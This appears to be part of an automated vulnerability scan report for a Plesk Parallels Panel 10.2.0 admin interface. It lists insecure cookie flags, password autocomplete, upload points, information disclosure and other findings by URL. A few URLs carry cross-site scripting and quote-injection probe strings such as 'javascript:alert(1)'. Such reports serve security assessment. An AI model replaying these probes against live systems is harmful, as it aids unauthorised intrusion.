3.179. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/power-mode-logout [REST URL parameter 1]

3.180. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home [REST URL parameter 1]

3.181. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/installed-applications/ [REST URL parameter 1]

3.182. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/logout [REST URL parameter 1]

3.183. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/create-subscription [REST URL parameter 1]

3.184. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/index [REST URL parameter 1]

3.185. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/logout [REST URL parameter 1]

3.186. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/admin-home.js [REST URL parameter 1]

3.187. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/smb.js [REST URL parameter 1]

3.188. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/list/ [REST URL parameter 1]

3.189. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 [REST URL parameter 1]

4. SSL cookie without secure flag set

4.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3

4.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage

4.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5

4.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list

4.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/

4.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/

4.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create

4.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list

4.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/

4.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/

4.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/

4.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4

4.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4

4.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4

4.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list

4.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/

4.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/

4.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list

4.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/

4.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/

4.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/

4.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools

4.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/

4.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/

4.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/

4.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings

4.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools

4.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list

4.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/

4.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/

4.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3

4.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3

4.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3

4.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/

4.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/

4.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/

4.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/

4.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/

4.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/

4.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/

4.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/

4.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/

4.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/

4.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/

4.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/

4.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/

4.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/

4.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/

4.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/

4.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/

4.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/

4.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/

4.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/

4.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/

4.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/ftp-sessions/

4.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences

4.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/

4.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/

4.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@1/properties/

4.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@2/properties/

4.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/

4.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/

5. Cookie without HttpOnly flag set

5.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3

5.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage

5.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5

5.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list

5.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/

5.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/

5.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create

5.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list

5.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/

5.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/

5.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/

5.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4

5.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4

5.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4

5.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list

5.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/

5.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/

5.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list

5.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/

5.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/

5.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/

5.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools

5.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/

5.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/

5.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/

5.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings

5.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools

5.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list

5.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/

5.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/

5.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3

5.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3

5.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3

5.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/

5.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/

5.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/

5.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/

5.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/

5.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/

5.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/

5.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/

5.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/

5.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/

5.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/

5.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/

5.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x59b7fd33ec13d9602b6ca6f628155d30/restore/

5.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xa87588dacfbd85c954970348bf0b8c44/restore/

5.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0xbb4f4821ef1d0873e84ab40979c20b5d/restore/

5.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/

5.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/

5.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/

5.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/

5.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/

5.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/

5.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/ftp-sessions/

5.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences

5.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/

5.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/

5.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@1/properties/

5.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@2/properties/

5.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/

5.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/

6. Password field with autocomplete enabled

6.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4

6.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/

6.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/

6.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/

6.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/

6.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile

7. Cross-domain POST

7.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/extras-domain/

7.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/manage-domain/

7.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/register-domain/

8. File upload functionality

8.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/logo/

8.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/

8.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/

8.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/

9. Email addresses disclosed

9.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create

9.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/

9.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php

9.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/

9.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/

9.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile

10. Private IP addresses disclosed

10.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create

10.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin

10.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription

11. Cacheable HTTPS response

11.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/favicon.ico

11.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php

12. HTML does not specify charset

12.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/

12.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)/

12.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)//

12.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/%EF%BF%BDjavascript:alert(1)//c4640c8d

12.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/account/

12.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/account/power-mode-logout

12.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/

12.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/featured-applications/

12.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin-home/installed-applications/

12.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/

12.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage

12.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/

12.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/create

12.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5

12.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list

12.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/

12.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/

12.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/true/

12.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/

12.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create

12.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list

12.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/

12.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/

12.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/

12.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/

12.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list

12.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/

12.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/index

12.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/

12.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/

12.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/Services

12.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/server-status/

12.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home

12.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/

12.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin

12.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin%27

12.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin'

12.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller

12.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/

12.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/

12.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/

12.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/create

12.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list

12.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/

12.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/

12.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/

12.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/

12.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/

12.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/

12.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/

12.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/

12.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/scripts/

12.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/

12.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings

12.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools

12.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/

12.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/create

12.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list

12.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/

12.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/

12.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/true/

12.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/login

12.63. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/

12.64. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/get-updates-data/

12.65. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/info/

12.66. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/info/id/

12.67. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/

12.68. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/id/

12.69. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/id/marketplace

12.70. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/usage-data

12.71. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/

12.72. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/bash

12.73. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/csh

12.74. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/false

12.75. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/rbash

12.76. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/sh

12.77. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/tcsh

12.78. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/

